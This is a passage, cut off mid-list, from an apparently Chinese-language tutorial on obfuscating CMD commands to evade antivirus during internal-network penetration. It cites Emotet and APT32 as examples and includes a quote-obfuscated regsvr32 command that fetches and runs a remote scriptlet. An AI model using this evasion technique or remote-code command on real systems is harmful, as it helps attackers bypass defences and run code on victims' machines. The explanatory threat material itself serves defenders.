一、CMD命令混淆简介
CMD中有许多的特殊字符,都有一定的特殊功能,我们将这些特殊字符拼接进命令中,并不影响命令本身的执行。可能达到绕过杀软的效果。在内网渗透的时候,执行CMD命令难免会被杀软拦截,因为杀软规则库的不同,可能会体现出不同的效果。
首先举几个现实中的例子:
1. Emotet木马Emotet一款著名的银行木马,首次出现于2014年年中。该木马主要通过垃圾邮件的方式传播感染目标用户,并通过脚本混淆、加密或编码方式来绕过AV检测,比如在垃圾邮件word附件中使用宏攻击, 如下图所示,这是一个从DOC文档嵌入的VBA宏代码中提取的CMD命令,乍一看上去,像是无意义的一串字符:
APT32在使用regsvr32.exe 远程注册组件,使用混淆方式来逃避C2检测:
regsvr32.exe /s /n /u /i:”h”t”t”p://.jpg scrobj.dll3. FIN7
